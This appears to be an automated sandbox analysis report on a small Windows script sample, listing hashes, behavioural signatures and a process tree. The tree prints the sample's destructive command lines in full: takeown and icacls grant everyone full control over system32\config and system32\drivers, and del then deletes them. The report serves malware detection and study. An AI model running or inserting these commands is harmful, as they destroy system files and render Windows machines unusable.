Analysis
max time kernel: 121s
max time network: 121s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 15-08-2024 21:37
Static task: static1
Behavioral task: behavioral1
Sample: target.wsf
Resource: win7-20240704-en
General
Target: target.wsf
Size: 2KB
MD5: 6425a144c5de5bc3bcd5865809150a0d
SHA1: 257d00e71e71832c90fc494b5121df3a8149560d
SHA256: 7c2461116f624799741f4983fb1bbb69c7c0024e7b258d8c79208669a75a69ad
SHA512: 95dd1168240a1e2011d45d2efe406ef88ee90140c97e9ec585fdd27ce15aa75a1479beae143a6d9717ed29002d818f165a2ad8910bc3b9ccc5d847024a173e34
Malware Config
Signatures

Possible privilege escalation attempt (4 IoCs)
Processes:
  pid   process
  2564  takeown.exe
  2608  takeown.exe
  1804  icacls.exe
  2744  icacls.exe

Modifies file permissions (1 TTP, 4 IoCs)
Processes:
  pid   process
  2564  takeown.exe
  2608  takeown.exe
  1804  icacls.exe
  2744  icacls.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes:
  description                      pid   process
  Token: SeTakeOwnershipPrivilege  2564  takeown.exe

Suspicious use of WriteProcessMemory (21 IoCs)
Processes:
  description                        pid   process      target process
  PID 2512 wrote to memory of 2264   2512  cmd.exe      WScript.exe
  PID 2512 wrote to memory of 2264   2512  cmd.exe      WScript.exe
  PID 2512 wrote to memory of 2264   2512  cmd.exe      WScript.exe
  PID 2264 wrote to memory of 2796   2264  WScript.exe  cmd.exe
  PID 2264 wrote to memory of 2796   2264  WScript.exe  cmd.exe
  PID 2264 wrote to memory of 2796   2264  WScript.exe  cmd.exe
  PID 2264 wrote to memory of 2844   2264  WScript.exe  cmd.exe
  PID 2264 wrote to memory of 2844   2264  WScript.exe  cmd.exe
  PID 2264 wrote to memory of 2844   2264  WScript.exe  cmd.exe
  PID 2844 wrote to memory of 2564   2844  cmd.exe      takeown.exe
  PID 2844 wrote to memory of 2564   2844  cmd.exe      takeown.exe
  PID 2844 wrote to memory of 2564   2844  cmd.exe      takeown.exe
  PID 2796 wrote to memory of 2608   2796  cmd.exe      takeown.exe
  PID 2796 wrote to memory of 2608   2796  cmd.exe      takeown.exe
  PID 2796 wrote to memory of 2608   2796  cmd.exe      takeown.exe
  PID 2796 wrote to memory of 2744   2796  cmd.exe      icacls.exe
  PID 2796 wrote to memory of 2744   2796  cmd.exe      icacls.exe
  PID 2796 wrote to memory of 2744   2796  cmd.exe      icacls.exe
  PID 2844 wrote to memory of 1804   2844  cmd.exe      icacls.exe
  PID 2844 wrote to memory of 1804   2844  cmd.exe      icacls.exe
  PID 2844 wrote to memory of 1804   2844  cmd.exe      icacls.exe
Processes (process tree; the leading number is the depth in the tree)

1. C:\Windows\system32\cmd.exe
   Command line: cmd /c "copy C:\Users\Admin\AppData\Local\Temp\target.wsf thescript.vbs && start thescript.vbs"
   PID: 2512
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\WScript.exe
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"
      PID: 2264
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\System32\cmd.exe
         Command line: "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
         PID: 2796
         - Suspicious use of WriteProcessMemory
         4. C:\Windows\system32\takeown.exe
            Command line: takeown /f c:\windows\system32\config\*
            PID: 2608
            - Possible privilege escalation attempt
            - Modifies file permissions
         4. C:\Windows\system32\icacls.exe
            Command line: icacls c:\windows\system32\config\* /grant everyone:(f)
            PID: 2744
            - Possible privilege escalation attempt
            - Modifies file permissions
      3. C:\Windows\System32\cmd.exe
         Command line: "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
         PID: 2844
         - Suspicious use of WriteProcessMemory
         4. C:\Windows\system32\takeown.exe
            Command line: takeown /f c:\windows\system32\drivers\*
            PID: 2564
            - Possible privilege escalation attempt
            - Modifies file permissions
            - Suspicious use of AdjustPrivilegeToken
         4. C:\Windows\system32\icacls.exe
            Command line: icacls c:\windows\system32\drivers\* /grant everyone:(f)
            PID: 1804
            - Possible privilege escalation attempt
            - Modifies file permissions
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 2KB
MD5: 6425a144c5de5bc3bcd5865809150a0d
SHA1: 257d00e71e71832c90fc494b5121df3a8149560d
SHA256: 7c2461116f624799741f4983fb1bbb69c7c0024e7b258d8c79208669a75a69ad
SHA512: 95dd1168240a1e2011d45d2efe406ef88ee90140c97e9ec585fdd27ce15aa75a1479beae143a6d9717ed29002d818f165a2ad8910bc3b9ccc5d847024a173e34

Filesize: 78B
MD5: ece02545122cc48c9d8afaf3f94dd04f
SHA1: 8e07b6da685faad07f8413230a95ce0ae8987e0d
SHA256: 5098743dbbd65767e7795bb819c00d091a749f0905fe0d496a06fc192efd0206
SHA512: e6c8df55b9845ea00301b0560321489cf064bfc02793495942e216a25f76b809a61d90ab0ce8ce4e514f626f368861c9f9b7814e3730e6482f0e2f40e88a2eb5